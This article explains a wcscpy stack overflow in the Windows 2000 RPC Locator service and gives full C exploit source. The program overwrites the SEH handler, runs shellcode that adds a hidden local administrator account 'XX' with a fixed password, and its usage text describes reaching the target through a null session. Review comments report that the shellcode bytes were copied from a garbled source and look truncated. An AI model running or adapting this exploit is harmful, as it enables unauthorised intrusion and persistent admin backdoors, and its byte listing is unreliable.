MS RPC Locator service exploit for Win2k (new version)
Created:
Article attributes: original
Article submission: eyas (ey4s_at_21cn.com)
/*------------------------------------------------------------------------------------
Created at: 2003-04-05
Last Updated: 2003-04-07
A few days ago I downloaded rpcexp.c from Packetstorm, but it failed against the Locator service, so I wanted to see how it works.
Looking further, it turned out to be a stack overflow in a wcscpy() call. After tracing it, the call chain is
as follows:
Locator!Locator::nsi_binding_lookup_begin
|__ Locator!Locator::nsi_binding_lookup_begin_name
    |__ Locator!CRemoteLookupHandle::Finished
        |__ Locator!CBroadcastLookupHandle::Initialize
            |__ Locator!GetBroadcastResults
                |__ Locator!FormQueryPacket
                    |__ wcscpy  <-- buff overflow
The return address of GetBroadcastResults sits at buff+0x514; on the Chinese and English Win2k SP0-SP3 builds I tested
the overflow point is the same. However, if that return address is overwritten, code in FormQueryPacket
faults with 0xc0000005 before the function returns, so the SEH handler has to be overwritten instead. The exception handler address
is stored at buff+0x504, again identical on the Chinese and English SP0-SP3 builds. The jmpaddr in Marcin Woak's rpcexp.c is 0x0090f8f0;
I guess that is where the shellcode sat during his own test and he jumped straight to it from the SEH handler,
since during my tests wcscpy copied our buff to somewhere around 0x009xxxxx. On other platforms that address
may of course differ, even a lot. This is only speculation, because I am a beginner and could not understand his code :(.
Obviously the overwritten SEH pointer cannot simply point at a jmp esp here. Later we found that at the instant
Windows starts dispatching the exception, the register EBX points just below the slot that holds the exception handler address:
if the handler address is stored at 0x0098f8ec, EBX is 0x0098f8e8. So overwriting
the handler address with the address of a `call ebx` instruction executes our shellcode. Later I went back to the master's
article and saw that it already describes this in more detail; I had not read it carefully enough :(. It does not say why,
though, so I do not know why either.
A `call ebx` address is not shared across platforms, either. Checking the locator.exe build on each platform: SP0 and SP1
(Chinese version) are 5.0.2195.1, SP2 is 5.0.2195.2505, SP3 is 5.0.2195.3761,
and one more is 5.0.2195.6136. Because locator.exe changes so little, I decided to take the `call ebx` address from locator.exe itself; kernel32
and the other DLLs are replaced by almost every hotfix, so their `call ebx` addresses are not universal.
Searching, I found 10 identical `call ebx` addresses shared by SP1 and SP2, one shared by SP1 and SP3, and none shared
by SP2 and SP3. There is an interesting detail, though: where SP1 has a `call ebx` at 0x0100a8eb, SP3
has one at 0x0100a8ec, hey..
After comparison, I decided to use 0x0100aee5 for JMP ADDR. In sp0, SP1, and SP2,
0: 004> U 0x0100aee5
0100aee5 ffd3 call EBX
In SP3,
0: 004> U 0x0100aee5
0100aee5 40 Inc eax
0100aee6 ffd3 call EBX
The structure of the buff we send is as follows:
| rpc_head_info? (8) | NOP (0x4f8) | JMP 0xa (2) | NOP (2) | call ebx addr (4) | NOP (4) | shellcode |
The shellcode has no special requirement other than that it must not contain a 0x0000 UTF-16 unit ("\x00\x00"): the Locator copies the name with wcscpy, which stops at the first NUL wide character, so the payload would be truncated there.
Most of the shellcode is taken straight from the master's article; thanks to him, and to the excellent articles by backend and ipxodi
on buffer overflows on Windows.
-------------------------------------------------------------------------------------*/
#define UNICODE
#define RPC_UNICODE_SUPPORTED
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <rpc.h>
#include <rpcnsi.h>
#pragma comment(lib, "rpcns4.lib")
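/* Offset of the SEH handler pointer inside buff. The writeup above reports
 * the same overflow point on every Win2k build tested (Chinese and English,
 * SP0-SP3). */
#define SEHOFFSET 0x504

/* Value written over the SEH handler pointer: the address of a "call ebx"
 * inside locator.exe. locator.exe was chosen because it changes far less
 * often than kernel32 and friends, whose call ebx addresses move with
 * almost every hotfix.
 *   SP0 / SP1 / SP2                 SP3
 *   0:004> u 0x0100aee5             0:004> u 0x0100aee5
 *   0100aee5 ffd3   call ebx        0100aee5 40     inc eax
 *                                   0100aee6 ffd3   call ebx
 * When the exception is dispatched EBX holds the address 4 bytes below the
 * handler slot, i.e. buff+0x500, so "call ebx" executes JMPOVER.
 * NOTE(review): this address is only meaningful for the Win2k SP0-SP3
 * builds listed in the writeup. On any other build the handler pointer
 * lands on arbitrary code and the Locator service simply crashes - a
 * denial of service rather than code execution. */
#define JMPADDR "\xe5\xae\x00\x01"

/* The 4 bytes at buff+0x500: "jmp short +0x0a" followed by two NOPs.
 * Taken from 0x502 the jump lands at 0x50c, the start of the shellcode,
 * so the JMPADDR bytes and the NOP pad after them are never executed. */
#define JMPOVER "\xeb\x0a\x90\x90"

/* Payload placed after the SEH slot.
 *
 * Constraint (see the writeup): the Locator copies the entry name with
 * wcscpy, so no 0x0000 UTF-16 unit may occur before the end of the payload.
 *
 * Rough reading of the bytes (not re-verified under a debugger):
 *   55 8b ec eb 64    push ebp; mov ebp,esp; jmp to the call at the end
 *   5a                pop edx  <- edx = address of the string table below
 *   b8 04 00 f1 77    scan downwards from 0x77f10004 for an "MZ" header
 *   ...               (hard-coded Win2k address; presumably kernel32)
 *   ...               walk the export name table comparing 14 bytes
 *                     ("GetProcAddress"), resolve WinExec and Sleep through
 *                     it, WinExec the command string, then Sleep.
 * The API names are compared byte-for-byte against the export table, so
 * their exact spelling and case matter.
 *
 * NOTE(review): this listing was transcribed from a garbled copy. The two
 * short lines "\xb8\xff\x50\x8b\x06" and "\xff\xd0\xe8\x5e\xff" look
 * truncated: the "eb 37" at offset 105 only reaches the final call, and
 * "e8 5e ff" is only a complete 5-byte call, if each line originally held
 * a run of four \xff bytes (mov eax,-1 / call rel32). The spacing and case
 * of the command string were likewise reconstructed. Compare against the
 * original rpcexp.c before relying on this byte string.
 *
 * Original author's note: "Hey, guy, you should modify this code slightly
 * by yourself." - i.e. the payload is deliberately left for the reader to
 * adjust. The stock payload creates a local administrator "XX" with a
 * fixed password: noisy and destructive, not something to run outside an
 * authorised test. */
char shellcode[] =
    "\x55\x8b\xec\xeb\x64\x5a\xb8\x04"
    "\x00\xf1\x77\x81\x38\x4d\x5a\x90"
    "\x00\x74\x03\x48\xeb\xf5\x8b\xd8"
    "\x8b\x73\x3c\x03\xf3\x8b\x76\x78"
    "\x03\xf3\x8b\x7e\x20\x03\xfb\x8b"
    "\x4e\x14\x33\xed\x56\x57\x51\x8b"
    "\x3f\x03\xfb\x8b\xf2\x33\xc9\x83"
    "\xc1\x0e\xf3\xa6\x74\x08\x59\x5f"
    "\x83\xc7\x04\x45\xe2\xe7\x59\x5f"
    "\x5e\x8b\xcd\x8b\x46\x24\x03\xc3"
    "\xd1\xe1\x03\xc1\x33\xc9\x66\x8b"
    "\x08\x8b\x46\x1c\x03\xc3\xc1\xe1"
    "\x02\x03\xc1\x8b\x00\x03\xc3\xeb"
    "\x02\xeb\x37\x8b\xfa\x8b\xf2\x89"
    "\x06\x83\xc7\x0f\x57\x53\xff\xd0"
    "\x83\xc6\x04\x89\x06\x83\xc7\x08"
    "\x57\x53\x8b\x46\xfc\xff\xd0\x83"
    "\xc6\x04\x89\x06\x33\xc0\x50\x83"
    "\xc7\x06\x57\x8b\x46\xfc\xff\xd0"
    "\xb8\xff\x50\x8b\x06"
    "\xff\xd0\xe8\x5e\xff"
    "GetProcAddress" "\x0"
    "WinExec" "\x0"
    "Sleep" "\x0"
    "cmd /c net.exe user XX 1A!.9nh /add & net localgroup administrators XX /add";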
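/* Fills buff (cap bytes) with the overflow string and returns the number of
 * bytes used, or 0 if cap is too small to hold it.
 *
 * Byte layout (matching the writeup):
 *   [0x000, 0x008)  "/.:/" as UTF-16 - looks like the name-service entry
 *                   prefix (the original called it "rpc_head_info?")
 *   [0x008, 0x500)  0x90 NOP sled; the Locator copies it with wcscpy, so
 *                   it is read as 0x9090 wide characters
 *   [0x500, 0x504)  JMPOVER: "jmp short +0x0a" + 2 NOPs; call ebx lands here
 *   [0x504, 0x508)  JMPADDR: overwrites the SEH handler pointer
 *   [0x508, 0x50c)  4 NOPs
 *   [0x50c, ...)    shellcode, including its terminating NUL byte
 *
 * The buffer is zeroed first so the wide string is always terminated by a
 * full 0x0000 unit. The original left the bytes after the shellcode's
 * single NUL uninitialised, so whether wcscpy stopped there depended on
 * the alignment of that NUL and on whatever was on the stack behind it. */
static unsigned long build_payload(unsigned char *buff, unsigned long cap)
{
    static const unsigned char prefix[8] = { '/', 0, '.', 0, ':', 0, '/', 0 };
    unsigned long pos = SEHOFFSET - 4;           /* start of JMPOVER, 0x500 */
    unsigned long used = pos + 12 + (unsigned long)sizeof(shellcode);

    /* +2: room for the 0x0000 terminator after the payload */
    if (cap < used + 2)
        return 0;

    memset(buff, 0, cap);
    memcpy(buff, prefix, sizeof prefix);
    memset(buff + sizeof prefix, 0x90, pos - sizeof prefix);
    memcpy(buff + pos, JMPOVER, 4);
    /* JMPADDR contains a 0x00 byte, hence memcpy rather than strcpy */
    memcpy(buff + pos + 4, JMPADDR, 4);
    memset(buff + pos + 8, 0x90, 4);
    memcpy(buff + pos + 12, shellcode, sizeof(shellcode));
    return used;
}

/* Thread body: builds the payload and hands it to RpcNsBindingLookupBegin()
 * as the entry name. The name-service client forwards the lookup to the
 * Locator named by the attacker-side registry values listed in usage(),
 * which is where the wcscpy overflow happens. The call may block for a
 * long time; main() only waits a bounded interval for this thread.
 *
 * lp: unused (CreateThread parameter).
 * Returns 0 after the call completes or raises, 1 if the payload does not
 * fit in the local buffer. */
DWORD WINAPI func(LPVOID lp)
{
    unsigned short wbuff[2000];                  /* 4000 bytes, 2-byte aligned for the wide-string cast */
    unsigned char *buff = (unsigned char *)wbuff;
    RPC_NS_HANDLE hNsHandle;
    unsigned long nsSyntaxType = RPC_C_NS_SYNTAX_DEFAULT;
    RPC_STATUS status;

    (void)lp;

    if (build_payload(buff, (unsigned long)sizeof wbuff) == 0) {
        printf("payload does not fit in the buffer\n");
        return 1;
    }

    RpcTryExcept
    {
        status = RpcNsBindingLookupBegin(nsSyntaxType,
                                         (unsigned short *)buff,
                                         0,
                                         NULL,
                                         0,
                                         &hNsHandle);
        printf("RpcNsBindingLookupBegin returned 0x%lx\n", (unsigned long)status);
    }
    RpcExcept(1)
    {
        printf("RPC Runtime raised exception 0x%lx\n", (unsigned long)RpcExceptionCode());
    }
    RpcEndExcept
    return 0;
}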
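/* Prints the usage banner to stdout. There are no command-line options:
 * the target is chosen through the two attacker-side registry values shown
 * below (presumably read by the RPC name-service client to pick the Locator
 * it queries), and the target's Locator is reached over a null session. */
void usage(void)
{
    fputs("\nxlocator -- ms rpc Locator service exploit for win2k_en_cn_sp0-3\n"
          "Author: cooleyas@21cn.com 2003-04-07\n"
          "Based on Marcin Woak's rpcexp.c\n"
          "Usage:\n"
          "1.set registry values in your workstation as below:\n"
          "HKLM\\software\\Microsoft\\RPC\\nameservice\\networkaddress = targetip\n"
          "HKLM\\software\\Microsoft\\RPC\\nameservice\\servernetworkaddress = targetip\n"
          "2.establish null session: net use \\\\targetip\\IPC$ \"\" /u:\"\"\n"
          "3.run exploit: xlocator\n"
          "if success, target will add a user \"XX\" passwd is \"1A!.9nh\".\n",
          stdout);
}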
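/* Entry point. Takes no arguments: anything on the command line prints the
 * usage banner and exits. func() runs on a worker thread because the RPC
 * lookup may not return once the Locator on the target has been hit;
 * main() waits at most 4 s for it and then exits, which tears the worker
 * down together with the process.
 *
 * Returns 0 on the normal path, 1 if the worker thread cannot be created. */
int main(int argc, char **argv)
{
    HANDLE hThread;

    (void)argv;
    if (argc != 1) {
        usage();
        return 0;
    }

    hThread = CreateThread(NULL, 0, func, NULL, 0, NULL);
    if (hThread == NULL) {
        printf("CreateThread failed, error %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    /* Bounded wait: returns early if the lookup finishes, otherwise gives
     * up after 4 s like the original Sleep(4000). */
    WaitForSingleObject(hThread, 4000);
    CloseHandle(hThread);
    printf("done.\n");
    return 0;
}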